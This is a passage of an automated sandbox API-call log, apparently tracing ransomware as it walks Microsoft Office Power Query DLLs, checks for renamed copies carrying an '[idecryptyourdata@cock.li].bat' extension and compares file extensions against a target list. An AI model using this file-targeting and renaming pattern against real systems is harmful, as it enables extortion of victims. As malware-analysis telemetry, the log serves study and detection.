Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.excel.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.015] lstrlenW (lpString=".doc") returned 4 [0171.015] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.015] lstrlenW (lpString=".docx") returned 5 [0171.015] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.015] lstrlenW (lpString=".pdf") returned 4 [0171.015] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.015] lstrlenW (lpString=".xls") returned 4 [0171.015] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.015] lstrlenW (lpString=".xlsx") returned 5 [0171.015] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.015] lstrlenW (lpString=".ppt") returned 4 [0171.015] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.015] lstrlenW (lpString=".zip") returned 4 [0171.015] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.015] lstrlenW (lpString=".rar") returned 4 [0171.015] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.015] lstrlenW (lpString=".bz2") returned 4 [0171.015] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.015] lstrlenW (lpString=".7z") returned 3 [0171.015] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.016] lstrlenW (lpString=".dbf") returned 4 [0171.016] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.016] lstrlenW (lpString=".1cd") returned 4 [0171.016] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.016] lstrlenW (lpString=".jpg") returned 4 [0171.016] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.016] lstrlenW (lpString=".doc") returned 4 [0171.016] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.016] lstrlenW (lpString=".docx") returned 5 [0171.016] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.016] lstrlenW (lpString=".pdf") returned 4 [0171.016] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.016] lstrlenW (lpString=".xls") returned 4 [0171.016] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.016] lstrlenW (lpString=".xlsx") returned 5 [0171.016] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.016] lstrlenW (lpString=".ppt") returned 4 [0171.017] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.017] lstrlenW (lpString=".zip") returned 4 [0171.017] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.017] lstrlenW (lpString=".rar") returned 4 [0171.017] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.017] lstrlenW (lpString=".bz2") returned 4 [0171.017] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.017] lstrlenW (lpString=".7z") returned 3 [0171.017] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.017] lstrlenW (lpString=".dbf") returned 4 [0171.017] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.017] lstrlenW (lpString=".1cd") returned 4 [0171.017] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.017] lstrlenW (lpString=".jpg") returned 4 [0171.017] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.017] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0171.017] lstrlenW (lpString="Microsoft.Mashup.Client.Windows.resources.dll") returned 45 [0171.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0171.019] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=195240) returned 1 [0171.019] CloseHandle (hObject=0x434) returned 1 [0171.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.windows.resources.dll")) returned 0x220 [0171.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.windows.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.020] lstrlenW (lpString=".doc") returned 4 [0171.020] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.020] lstrlenW (lpString=".docx") returned 5 [0171.020] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.020] lstrlenW (lpString=".pdf") returned 4 [0171.020] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.020] lstrlenW (lpString=".xls") returned 4 [0171.020] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.020] lstrlenW (lpString=".xlsx") returned 5 [0171.020] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.020] lstrlenW (lpString=".ppt") returned 4 [0171.020] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.020] lstrlenW (lpString=".zip") returned 4 [0171.020] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.020] lstrlenW (lpString=".rar") returned 4 [0171.020] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.020] lstrlenW (lpString=".bz2") returned 4 [0171.020] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.020] lstrlenW (lpString=".7z") returned 3 [0171.020] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.020] lstrlenW (lpString=".dbf") returned 4 [0171.020] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.020] lstrlenW (lpString=".1cd") returned 4 [0171.020] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.021] lstrlenW (lpString=".jpg") returned 4 [0171.021] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.021] lstrlenW (lpString=".doc") returned 4 [0171.021] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString=".docx") returned 5 [0171.021] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.021] lstrlenW (lpString=".pdf") returned 4 [0171.021] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString=".xls") returned 4 [0171.021] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString=".xlsx") returned 5 [0171.021] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.021] lstrlenW (lpString=".ppt") returned 4 [0171.021] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.021] lstrlenW (lpString=".zip") returned 4 [0171.021] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString=".rar") returned 4 [0171.021] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.021] lstrlenW (lpString=".bz2") returned 4 [0171.021] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.021] lstrlenW (lpString=".7z") returned 3 [0171.021] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.022] lstrlenW (lpString=".dbf") returned 4 [0171.022] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.022] lstrlenW (lpString=".1cd") returned 4 [0171.022] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0171.041] lstrlenW (lpString=".jpg") returned 4 [0171.041] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.041] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0171.041] lstrlenW (lpString="Microsoft.Mashup.Document.resources.dll") returned 39 [0171.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.document.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0171.042] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=254016) returned 1 [0171.042] CloseHandle (hObject=0x434) returned 1 [0171.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.document.resources.dll")) returned 0x220 [0171.043] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.document.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.document.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.043] lstrlenW (lpString=".doc") returned 4 [0171.043] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.043] lstrlenW (lpString=".docx") returned 5 [0171.043] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.043] lstrlenW (lpString=".pdf") returned 4 [0171.043] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.043] lstrlenW (lpString=".xls") returned 4 [0171.043] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.043] lstrlenW (lpString=".xlsx") returned 5 [0171.043] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.043] lstrlenW (lpString=".ppt") returned 4 [0171.043] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.044] lstrlenW (lpString=".zip") returned 4 [0171.044] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.044] lstrlenW (lpString=".rar") returned 4 [0171.044] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.044] lstrlenW (lpString=".bz2") returned 4 [0171.044] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.044] lstrlenW (lpString=".7z") returned 3 [0171.044] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.044] lstrlenW (lpString=".dbf") returned 4 [0171.044] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.044] lstrlenW (lpString=".1cd") returned 4 [0171.044] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.044] lstrlenW (lpString=".jpg") returned 4 [0171.044] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.044] lstrlenW (lpString=".doc") returned 4 [0171.044] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.044] lstrlenW (lpString=".docx") returned 5 [0171.045] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.045] lstrlenW (lpString=".pdf") returned 4 [0171.045] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.045] lstrlenW (lpString=".xls") returned 4 [0171.045] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.045] lstrlenW (lpString=".xlsx") returned 5 [0171.045] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.045] lstrlenW (lpString=".ppt") returned 4 [0171.045] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.045] lstrlenW (lpString=".zip") returned 4 [0171.045] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.045] lstrlenW (lpString=".rar") returned 4 [0171.045] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.045] lstrlenW (lpString=".bz2") returned 4 [0171.045] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.045] lstrlenW (lpString=".7z") returned 3 [0171.045] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.045] lstrlenW (lpString=".dbf") returned 4 [0171.045] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.045] lstrlenW (lpString=".1cd") returned 4 [0171.045] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Document.resources.dll") returned 144 [0171.046] lstrlenW (lpString=".jpg") returned 4 [0171.046] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.046] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0171.046] lstrlenW (lpString="Microsoft.MashupEngine.resources.dll") returned 36 [0171.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashupengine.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0171.047] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=715432) returned 1 [0171.047] CloseHandle (hObject=0x434) returned 1 [0171.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashupengine.resources.dll")) returned 0x220 [0171.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashupengine.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashupengine.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.048] lstrlenW (lpString=".doc") returned 4 [0171.048] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.048] lstrlenW (lpString=".docx") returned 5 [0171.048] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.048] lstrlenW (lpString=".pdf") returned 4 [0171.048] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.048] lstrlenW (lpString=".xls") returned 4 [0171.048] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.048] lstrlenW (lpString=".xlsx") returned 5 [0171.048] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.048] lstrlenW (lpString=".ppt") returned 4 [0171.048] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.049] lstrlenW (lpString=".zip") returned 4 [0171.049] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.049] lstrlenW (lpString=".rar") returned 4 [0171.049] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.049] lstrlenW (lpString=".bz2") returned 4 [0171.049] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.049] lstrlenW (lpString=".7z") returned 3 [0171.049] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.049] lstrlenW (lpString=".dbf") returned 4 [0171.049] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.049] lstrlenW (lpString=".1cd") returned 4 [0171.049] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.049] lstrlenW (lpString=".jpg") returned 4 [0171.049] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.050] lstrlenW (lpString=".doc") returned 4 [0171.050] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.050] lstrlenW (lpString=".docx") returned 5 [0171.050] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.050] lstrlenW (lpString=".pdf") returned 4 [0171.050] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.050] lstrlenW (lpString=".xls") returned 4 [0171.050] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.050] lstrlenW (lpString=".xlsx") returned 5 [0171.050] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.050] lstrlenW (lpString=".ppt") returned 4 [0171.050] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.MashupEngine.resources.dll") returned 141 [0171.050] lstrlenW (lpString=".zip") returned 4 [0171.050] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.050] lstrlenW 